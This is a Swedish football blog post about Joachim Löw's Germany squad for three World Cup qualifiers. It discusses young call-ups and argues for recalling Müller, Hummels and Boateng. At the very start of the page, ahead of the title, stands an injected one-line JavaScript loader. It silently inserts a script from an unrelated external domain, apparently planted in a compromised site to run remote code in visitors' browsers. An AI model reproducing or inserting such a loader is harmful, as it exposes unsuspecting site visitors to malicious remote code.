;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Landslagsuppehåll – Die Mannschaft – FMSweden
Meny Stäng

Landslagsuppehåll – Die Mannschaft

Keven Tysk-tisdag

Förra veckan tog Joachim Löw ut följande landslagstrupp till kommande matcher i VM-kvalet:

  • Island ?? 25 mars
  • Rumänien ??  28 mars
  • Nordmakedonien ?? 31 mars

Kul att se 17-årige Florian Wirtz och 18-årige Jamal Musiala få chansen i A-landslaget. Samtidigt är Draxler, Brandt och Reus utanför truppen. Den sistnämnda är tyvärr skadad. En som får göra comeback i landslaget är Amin Younes. Eintracht Frankfurts vindsnabba ytter har gjort en väldigt fin säsong i Bundesliga och stod bland annat för detta mål när Löw var på plats och såg matchen mellan Eintracht – Bayern München.

Som ni ser är den rutinerade trion: Thomas Müller, Mats Hummels och Jérôme Boateng fortsatt petade. Många tyska medier menar på att Müller och Hummels kommer trots allt tas ut i EM-truppen. Personligen hoppas jag väldigt mycket på det. Man måste ta ut en vinnarskalle som Müller, speciellt när han levererar på detta sätt:

Sedan tycker jag också att Hummels och Boateng borde vara aktuella då MB-positionen är långt från säker. Koch är precis tillbaka från en långtidsskada, Süle är småskadad och varit betydligt svagare än ifjol och Ginter är helt ok… Den enda mittbacken som har formen med sig är Rüdiger. Därför borde både Hummels och Boa vara aktuella.

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar